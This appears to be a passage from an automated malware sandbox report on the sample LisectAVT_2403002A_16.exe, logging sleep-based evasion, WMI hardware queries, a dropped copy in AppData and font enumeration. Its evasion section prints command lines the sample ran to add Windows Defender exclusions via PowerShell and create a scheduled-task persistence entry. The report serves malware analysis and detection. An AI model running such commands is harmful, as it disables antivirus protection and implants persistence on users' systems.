                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8436
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8182
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 505
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Window / User API: threadDelayed 2784
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe Window / User API: threadDelayed 1041
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Window / User API: threadDelayed 1143
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe Window / User API: threadDelayed 2365
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 2060 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7540 Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7576 Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7428 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7628 Thread sleep count: 2784 > 30
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -11990383647911201s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99891s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99776s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99671s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99548s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99437s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7628 Thread sleep count: 1041 > 30
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99296s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99172s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -99059s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98938s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98813s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98704s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98594s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98454s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98329s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98219s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -98107s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -97999s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -97774s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -97469s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -97279s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe TID: 7728 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 7740 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8044 Thread sleep count: 1143 > 30
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8044 Thread sleep count: 2365 > 30
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -100000s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99781s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99671s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99342s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99226s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -99119s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -98843s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -98634s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -98499s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -98336s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -98233s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -98109s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -97999s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe TID: 8048 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99891Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99776Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99671Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99548Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99296Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99172Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 99059Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98938Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98813Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98704Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98594Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98454Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98329Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98219Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 98107Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97999Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97774Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97469Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 97279Jump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99890
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99781
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99671
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99562
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99453
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99342
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99226
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 99119
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98843
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98634
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98499
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98336
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98233
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 98109
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 97999
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exeThread delayed: delay time: 922337203685477
                        Source: LisectAVT_2403002A_16.exe, 00000009.00000002.2899755875.00000000011EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
                        Source: NxmtwwVGOtEdjd.exe, 0000000F.00000002.2900321221.000000000100C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Win6
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Memory written: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Memory written: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpB5CB.tmp"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Process created: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe "C:\Users\user\Desktop\LisectAVT_2403002A_16.exe"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NxmtwwVGOtEdjd" /XML "C:\Users\user\AppData\Local\Temp\tmpCD2C.tmp"
                        Source: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe | Process created: C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe "C:\Users\user\AppData\Roaming\NxmtwwVGOtEdjd.exe"
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
